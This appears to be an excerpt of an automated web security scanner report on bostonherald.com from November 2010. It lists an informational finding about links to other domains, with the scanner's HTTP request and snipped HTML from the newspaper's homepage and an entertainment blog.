<a href="http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2010/11/05/illegal-downloader-jammie-thomas-rasset-hit-with-15-million-fine/"><img src="http://multimedia.heraldinteractive.com/images/419a149cad_music07072009.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/celtics/index.php/2010/11/06/kevin-garnett-dismisses-charlie-villanueva-as-a-nobody/"><img src="http://cache.heraldinteractive.com/blogs/sports/celtics/wp-content/uploads/2010/11/kgscream.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/2010/11/07/todays-patriots-starters-wilfork-at-end-pryor-at-nose-for-d-mankins-at-g-update-10-0-browns/"><img src="http://cache.heraldinteractive.com/blogs/sports/rap_sheet/wp-content/uploads/2010/11/brady-and-lloyd.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://bostonherald.com/blogs/entertainment/the_assistant/?p=2210"><img src="http://images.nymag.com/images/2/daily/2010/11/05_privatepractice_560x375.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/lifestyle/behind_the_wheel/?p=1147"><img src="http://cache.heraldinteractive.com/blogs/lifestyle/behind_the_wheel/wp-content/uploads/2010/11/nashstreetrod.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/red_sox/index.php/2010/11/07/money-matters-taking-a-look-at-red-sox-payroll/"><img src="http://cache.heraldinteractive.com/blogs/sports/red_sox/wp-content/uploads/2010/11/theoheraldfile.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/high_school/index.php/2010/11/05/fridays-high-school-football-schedule-2/"><img src="http://cache.heraldinteractive.com/blogs/sports/high_school/wp-content/uploads/2010/11/img_0192.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/city_desk_wired/index.php/2010/11/07/british-fear-factor-over-bay-state-jails/"><img src="http://cache.heraldinteractive.com/blogs/news/city_desk_wired/wp-content/uploads/2010/11/neil-entwistle.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://bostonherald.com/blogs/lifestyle/fork_lift/?p=2367"><img src="http://cache.heraldinteractive.com/blogs/lifestyle/fork_lift/wp-content/uploads/2010/11/efd7c5_ltpback20101105-300x261.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1294819"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101108/49db30_seat_11082010.jpg"></a>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('galleries/index.php?gallery_id=9','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img src="http://multimedia.heraldinteractive.com/images/promo/frontpdf_11072010.jpg" alt="" /></a>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('/galleries/index.php?gallery_id=10','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img src="http://multimedia.heraldinteractive.com/images/promo/backpdf_11072010.jpg" alt="" /></a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
<div>+ <a href="http://coupons.smartsource.com/web/index.aspx?Link=5ZTSY3SFTCCTE">Money Saving Coupons</a>
...[SNIP]...
<div>+ <a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<div>+ <a href="http://www.people2people.com/?connect=boshrld&page=login">Personals</a>
...[SNIP]...
<div>+ <a href="http://www.shoplocal.com/bostonherald/">Great Shopping Deals</a>
...[SNIP]...
<div>+ <a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<a href="/about/electronic_edition/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/homepage/sampleFrontPage120.jpg" style="border: 1px #333 solid" /></a>
...[SNIP]...
<a
href="/news/regional/view/20101108roxbury_man_dies_after_stabbing_at_liquor_store/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/0b0f8e_stab_11082010.jpg" alt="GRIEVING: A friend hugs Shondell Davis, the aunt of the stabbing victim, in Roxbury yesterday." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/news/regional/view/20101108roxbury_man_dies_after_stabbing_at_liquor_store/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/weather/"><img src="http://cache.heraldinteractive.com/images/siteImages/weather/12.gif" /></a>
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/18.gif" width="57" height="48"/><br />
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/04.gif" width="57" height="48"/><br />
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/03.gif" width="57" height="48"/><br />
...[SNIP]...
<a
href="/sports/columnists/view/20101108eric_mangini_outdoes_bill_belichick_student_teaches_lesson/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101108/stp/f0cad3_shake_11082010.jpg" alt="PARTING SHOT: Eric Mangini shakes hands with Bill Belichick after his Browns hammered the Patriots, 34-14, yesterday in Cleveland." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/sports/columnists/view/20101108eric_mangini_outdoes_bill_belichick_student_teaches_lesson/format=comments&srvc=home&position=also">
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028"></script>
...[SNIP]...
</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/schedule.aspx?team=028,season=">Schedule</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/individual.aspx?team=028">Ind. Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077"></script>
...[SNIP]...
</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/sched.aspx?id=077">Schedule</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/teamstat.aspx?id=077">Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092"></script>
...[SNIP]...
</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/schedule.aspx?team=092,season=">Schedule</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/tmstat.aspx?id=092">Ind. Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121"></script>
...[SNIP]...
</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/schedule.aspx?team=121,season=">Schedule</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/indstats.aspx?team=121">Ind. Stats</a>
...[SNIP]...
<a
href="/entertainment/movies/general/view/20101108desperate_hours_franco_spends_time_with_hiker_who_survived_against_the_odds/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/8b11c8_ltpfranco20101107_edited-1.jpg" alt="James Franco in ‘127 Hours.’" /></a>
...[SNIP]...
<a href="/entertainment/movies/dvd/view.bg?articleid=1294553&srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101106/5187df_ltpdvd20101107.jpg" border="0"
width="207" height="181" caption="GROWN UPS" /></a>
...[SNIP]...
<a
href="/track/inside_track/view/20101108tracked_down_michelle_mcgee_ty_law_lou_merloni_and_more/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/4348cc_bomb_11082010.jpg" alt="Michelle ‘Bombshell’ McGee,left, and Revolution Rock Bar bartender Caela Scott." /></a>
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1294606&srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101106/d5c5f8_Tyler_09192010.JPG" border="0"
width="207" height="181" caption="Steven Tyler not sweating Kid Rock snipe" /></a>
...[SNIP]...
<a
href="/business/general/view/20101108caritas_sale_critic_hits_ethics_board/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/bc9344_coak_11082010.jpg" alt="Martha Coakley." /></a>
...[SNIP]...
<div id="busTabsHp" style="width:180px; margin:0 auto;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
<a
href="/jobfind/news/technology/view/20101108polaroid_goes_back_to_the_future_instant_cameras_set_for_age_of_internet/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/d24c15_pola2_11082010.jpg" alt="REPLAY: The $90 300 Instant Camera(inset) replicates the function of the classic Polaroid camera - more or less, since the printout is about half the size. The $200 Pogo offers both instant and digital photos." /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/jobfind"><img src="http://cache.heraldinteractive.com/images/siteImages/jobfind/homepageHotJobsSearch.gif"></a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.homefind.com/?srvc=home&position=also">Homefind</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/real_estate/view/20101107critics_hit_feds_appraisal_rules/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="featuredListHF_logo">
<img src="http://multimedia.heraldinteractive.com/misc/alsoIn/homefind/HF5728980.jpg" />
    </div>
   <span class="bold">
    <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">
1212 North Main Street,<br>
...[SNIP]...
</span>
        <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">View listing</a>
...[SNIP]...
</div>
<a class="orange" href="http://www.homefind.com">Search Homes</a>  |  
<a class="orange" href="http://www.homefind.com/post-property/">Post a Property</a>  |  
<a class="orange" href="http://www.homefind.com/for-agents/">For Agents</a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.carfind.com/?srvc=home&position=also">Carfind</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/automotive/view/20101107blinking_jetta_hates_her_husband/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/">Search Cars</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/sellCar.bg">Sell a Car</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://boston30.autochooser.com/results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp">Find a dealer</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" style="margin-right:30px;"></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" style="margin-right:30px;"></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif"></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2F%3FshowResults%3D1&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

8.2. http://bostonherald.com/blogs/entertainment/the_assistant/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/blogs/entertainment/the_assistant/

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/blogs/entertainment/the_assistant/?srvc=home&position=recent

The response contains the following links to other domains:

http://cache.heraldinteractive.com/CSS/dropdown.css
http://cache.heraldinteractive.com/CSS/index.css
http://cache.heraldinteractive.com/CSS/subnavigation.css
http://cache.heraldinteractive.com/CSS/tabbed.css
http://cache.heraldinteractive.com/CSS/universal.css
http://cache.heraldinteractive.com/images/siteImages/blogLogos/the_assistant.jpg?sdf=sdfs
http://cache.heraldinteractive.com/images/siteImages/header/blogs/logoInsideBlogs.gif
http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif
http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif
http://cache.heraldinteractive.com/images/siteImages/icons/xmlgrey.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://cache.heraldinteractive.com/siteImages/icons/xml_sm.gif
http://ccinsider.comedycentral.com/2010/11/05/exclusive-stephen-colbert-and-elvis-costello-duet/
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://feeds.feedburner.com/bostonherald/
http://images.nymag.com/images/2/daily/2010/11/05_privatepractice_560x375.jpg
http://kidsclothesclub.org/
http://media.mtvnservices.com/mgid:cms:item:comedycentral.com:364519
http://nymag.com/daily/entertainment/2010/11/private_practice_rape_episode.html
http://tv.gawker.com/5679902/jon-stewart-at-the-1994-boston-college-fest
http://tv.gawker.com/5682920/the-funniest-song-about-daylight-savings-youll-hear-this-year
http://widget.nbc.com/videos/nbcshort_at.swf?CXNID=1000004.10045NXC&widID=4727a250e66f9723&clipID=805561&showID=61
http://www.barcc.org/
http://www.barcc.org/information/facts/stats
http://www.carfind.com/
http://www.colbertnation.com/
http://www.colbertnation.com/full-episodes/
http://www.colbertnation.com/the-colbert-report-videos/364519/november-04-2010/exclusive---elvis-costello---all-i-have-to-do-is-dream
http://www.colbertnation.com/video/tag/March%20to%20Keep%20Fear%20Alive
http://www.eonline.com/uberblog/watch_with_kristin/b209713_The_Morning_After_Lets_Talk_About_Private_Practice.html
http://www.homefind.com/
http://www.indecisionforever.com/
http://www.jlboston.org/jlb/npo.jsp?pg=support6
http://www.kidsclothesclub.org/
http://www.telegraph.co.uk/technology/google/8108086/Turkey-re-bans-YouTube.html
http://www.thecateredaffair.com/
http://www.yasrsly.com/starbuck-barista-sterotypes-customers/8070/
http://www.youtube.com/v/-f_DPrSEOEo?fs=1&hl=en_US
http://www.youtube.com/v/6tMEkcrB9RU?fs=1&hl=en_US
http://www.youtube.com/v/8LLly-L77kw?fs=1&hl=en_US
http://www.youtube.com/v/BptKLS7Eks0?fs=1&hl=en_US
http://www.youtube.com/v/IwfwgbZPZ9w?version=3
http://www.youtube.com/v/OmYeuvDMvrY?fs=1&hl=en_US
http://www.youtube.com/v/QESfEd180rQ?fs=1&hl=en_US
http://www.youtube.com/v/US-73XMMDx4?fs=1&hl=en_US
http://www.youtube.com/v/UuQAEVLljF4?fs=1&hl=en_US
http://www.youtube.com/v/isYF5E0WxGU?fs=1&hl=en_US
http://www.youtube.com/v/nLM8xpsAURc?fs=1&hl=en_US
http://www.youtube.com/v/vQgbkCd4EYU?fs=1&hl=en_US
http://www.youtube.com/v/y2IvWCMH-TU?version=3

Request

GET /blogs/entertainment/the_assistant/?srvc=home&position=recent HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:10:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://bostonherald.com/blogs/entertainment/the_assistant/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 86832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<meta name="SUBSECTION" content="Blogs" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/universal.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/tabbed.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/index.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/dropdown.css" media="screen,projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/subnavigation.css" media="screen,projection" />

   <link rel="stylesheet" type="text/css" href="/CSS/blogs.css" media="screen,projection" />
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<a href="/blogs/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/blogs/logoInsideBlogs.gif" alt="Blogs" /></a>
...[SNIP]...
div id="carfind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a class="displayBlock" href="http://www.carfind.com"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Carfind" />Carfind</a>
...[SNIP]...
iv id="homefind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a class="displayBlock" href="http://www.homefind.com"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Homefind" />Homefind</a>
...[SNIP]...
<a class="displayBlock" href="/jobfind/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Jobfind" />Jobfind</a>
...[SNIP]...
<a href="/blogs/news/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />News & Business Blogs</a>
...[SNIP]...
<a href="/blogs/sports/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />Sports Blogs</a>
...[SNIP]...
<a href="/blogs/entertainment/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />Entertainment Blogs</a>
...[SNIP]...
<a href="/blogs/lifestyle/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />Lifestyle Blogs</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/xmlgrey.gif" alt="Boston Herald RSS" /></a>
...[SNIP]...
</strong> Just be grateful you have this magical source of joy, unlike those <a href="http://www.telegraph.co.uk/technology/google/8108086/Turkey-re-bans-YouTube.html" target="_blank">poor deprived kids in Turkey.</a>
...[SNIP]...
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="480" height="385" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" />
...[SNIP]...
<param name="src" value="http://www.youtube.com/v/6tMEkcrB9RU?fs=1&hl=en_US" /><embed type="application/x-shockwave-flash" width="480" height="385" src="http://www.youtube.com/v/6tMEkcrB9RU?fs=1&hl=en_US" allowscriptaccess="always" allowfullscreen="true"></embed>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/BptKLS7Eks0?fs=1&hl=en_US" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"></embed>
...[SNIP]...
<br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="480" height="385" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" />
...[SNIP]...
<param name="src" value="http://www.youtube.com/v/US-73XMMDx4?fs=1&hl=en_US" /><embed type="application/x-shockwave-flash" width="480" height="385" src="http://www.youtube.com/v/US-73XMMDx4?fs=1&hl=en_US" allowscriptaccess="always" allowfullscreen="true"></embed>
...[SNIP]...
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="640" height="385" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" />
...[SNIP]...
<param name="src" value="http://www.youtube.com/v/QESfEd180rQ?fs=1&hl=en_US" /><embed type="application/x-shockwave-flash" width="640" height="385" src="http://www.youtube.com/v/QESfEd180rQ?fs=1&hl=en_US" allowscriptaccess="always" allowfullscreen="true"></embed>
...[SNIP]...
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="640" height="385" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" />
...[SNIP]...
<param name="src" value="http://www.youtube.com/v/-f_DPrSEOEo?fs=1&hl=en_US" /><embed type="application/x-shockwave-flash" width="640" height="385" src="http://www.youtube.com/v/-f_DPrSEOEo?fs=1&hl=en_US" allowscriptaccess="always" allowfullscreen="true"></embed>
...[SNIP]...
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="640" height="385" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" />
...[SNIP]...
<param name="src" value="http://www.youtube.com/v/nLM8xpsAURc?fs=1&hl=en_US" /><embed type="application/x-shockwave-flash" width="640" height="385" src="http://www.youtube.com/v/nLM8xpsAURc?fs=1&hl=en_US" allowscriptaccess="always" allowfullscreen="true"></embed>
...[SNIP]...
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="480" height="385" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" />
...[SNIP]...
<param name="src" value="http://www.youtube.com/v/UuQAEVLljF4?fs=1&hl=en_US" /><embed type="application/x-shockwave-flash" width="480" height="385" src="http://www.youtube.com/v/UuQAEVLljF4?fs=1&hl=en_US" allowscriptaccess="always" allowfullscreen="true"></embed>
...[SNIP]...
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="480" height="385" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" />
...[SNIP]...
<param name="src" value="http://www.youtube.com/v/8LLly-L77kw?fs=1&hl=en_US" /><embed type="application/x-shockwave-flash" width="480" height="385" src="http://www.youtube.com/v/8LLly-L77kw?fs=1&hl=en_US" allowscriptaccess="always" allowfullscreen="true"></embed>
...[SNIP]...
<br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="480" height="385" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" />
...[SNIP]...
<param name="src" value="http://www.youtube.com/v/isYF5E0WxGU?fs=1&hl=en_US" /><embed type="application/x-shockwave-flash" width="480" height="385" src="http://www.youtube.com/v/isYF5E0WxGU?fs=1&hl=en_US" allowscriptaccess="always" allowfullscreen="true"></embed>
...[SNIP]...
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="480" height="385" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" />
...[SNIP]...
<param name="src" value="http://www.youtube.com/v/OmYeuvDMvrY?fs=1&hl=en_US" /><embed type="application/x-shockwave-flash" width="480" height="385" src="http://www.youtube.com/v/OmYeuvDMvrY?fs=1&hl=en_US" allowscriptaccess="always" allowfullscreen="true"></embed>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/vQgbkCd4EYU?fs=1&hl=en_US" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="640" height="385"></embed>
...[SNIP]...
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="100" height="100" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" />
...[SNIP]...
<param name="src" value="http://www.youtube.com/v/y2IvWCMH-TU?version=3" /><embed type="application/x-shockwave-flash" width="640" height="390" src="http://www.youtube.com/v/y2IvWCMH-TU?version=3" allowscriptaccess="always" allowfullscreen="true"></embed>
...[SNIP]...
<p>(via <a href="http://tv.gawker.com/5682920/the-funniest-song-about-daylight-savings-youll-hear-this-year" target="_blank">Gawker</a>
...[SNIP]...
<p class="MsoNormal"><a href="http://images.nymag.com/images/2/daily/2010/11/05_privatepractice_560x375.jpg"><img class="aligncenter" src="http://images.nymag.com/images/2/daily/2010/11/05_privatepractice_560x375.jpg" alt="" width="560" height="375" /></a>
...[SNIP]...
<p class="MsoNormal">Most victims are not raped by strangers. In fact, I read on <a href="http://www.barcc.org" target="_blank">BARCC</a>
...[SNIP]...
</em> has definitely fluctuated in the ratings, and Sweeps week is the time to bring in the heavy artillery. So should we be grateful that a mainstream TV show speaks out about an injustice that <a href="http://www.barcc.org/information/facts/stats" target="_blank">1 in 6 women</a>
...[SNIP]...
<p class="MsoNormal"><a href="http://www.eonline.com/uberblog/watch_with_kristin/b209713_The_Morning_After_Lets_Talk_About_Private_Practice.html" target="_blank">The Morning After: Let’s Talk About Private Practice</a>
...[SNIP]...
<p class="MsoNormal"><a href="http://nymag.com/daily/entertainment/2010/11/private_practice_rape_episode.html" target="_blank">Nussbaum on Last Night’s Private Practice Episode</a>
...[SNIP]...
